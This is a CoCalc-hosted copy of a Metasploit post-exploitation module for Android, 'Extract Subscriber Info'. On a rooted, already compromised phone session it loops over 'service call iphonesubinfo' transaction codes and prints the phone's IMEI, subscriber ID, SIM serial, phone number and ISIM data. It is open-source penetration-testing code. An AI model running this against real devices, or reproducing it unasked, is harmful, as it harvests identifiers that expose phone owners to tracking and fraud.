Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/android/gather/sub_info.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  include Msf::Post::Common

9
  include Msf::Post::Android::Priv

10
  include Msf::Post::Android::System

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Extract Subscriber Info',

17
        'Description' => %q{

18
          This module displays the subscriber info stored on the target phone.

19
          It uses call service to get values of each transaction code like IMEI, etc.

20
        },

21
        'License' => MSF_LICENSE,

22
        'Author' => ['Auxilus'],

23
        'SessionTypes' => [ 'meterpreter', 'shell' ],

24
        'Platform' => 'android',

25
        'Notes' => {

26
          'Stability' => [CRASH_SAFE],

27
          'SideEffects' => [],

28
          'Reliability' => []

29
        }

30
      )

31
    )

32
  end

33


34
  def run

35
    fail_with(Failure::NoAccess, 'This module requires root permissions.') unless is_root?

36


37
    @transaction_codes ||= [

38
      'DeviceId',

39
      'DeviceIdForSubscriber',

40
      'ImeiForSubscriber',

41
      'DeviceSvn',

42
      'SubscriberId',

43
      'SubscriberIdForSubscriber',

44
      'GroupIdLevel1',

45
      'GroupIdLevel1ForSubscriber',

46
      'IccSerialNumber',

47
      'IccSerialNumberForSubscriber',

48
      'Line1Number',

49
      'Line1NumberForSubscriber',

50
      'Line1AlphaTag',

51
      'Line1AlphaTagForSubscriber',

52
      'Msisdn',

53
      'MsisdnForSubscriber',

54
      'VoiceMailNumber',

55
      'VoiceMailNumberForSubscriber',

56
      'CompleteVoiceMailNumber',

57
      'CompleteVoiceMailNumberForSubscriber',

58
      'VoiceMailAlphaTag',

59
      'VoiceMailAlphaTagForSubscriber',

60
      'IsimImpi',

61
      'IsimDomain',

62
      'IsimImpu',

63
      'IsimIst',

64
      'IsimPcscf',

65
      'IsimChallengeResponse',

66
      'IccSimChallengeResponse'

67
    ]

68
    arr ||= []

69
    for code in 1..@transaction_codes.length do

70
      print_status("using code : #{code}")

71
      block = cmd_exec("service call iphonesubinfo #{code}")

72
      value, tc = get_val(block, code)

73
      arr << [tc, value]

74
    end

75


76
    tc_tbl = Rex::Text::Table.new(

77
      'Header' => 'Subscriber info',

78
      'Indent' => 1,

79
      'Columns' => ['transaction code', 'value']

80
    )

81


82
    arr.each do |a|

83
      tc_tbl << [

84
        a[0],     #  TRANSACTION CODE

85
        a[1]      #  value

86
      ]

87
    end

88
    print_line(tc_tbl.to_s)

89
  end

90


91
  def get_val(data, code)

92
    parsed = data.gsub(/Parcel/, '')

93
    string = ''

94
    100.times do |i|

95
      next if i % 2 == 0

96


97
      str = parsed.split("'")[i]

98
      break if str.nil?

99


100
      string += str

101
    end

102
    v = ''

103
    string.split('.').each do |chr|

104
      next if chr.nil? || (chr == "\n")

105


106
      v += chr

107
    end

108
    return v, @transaction_codes[code - 1]

109
  end

110
end

111


112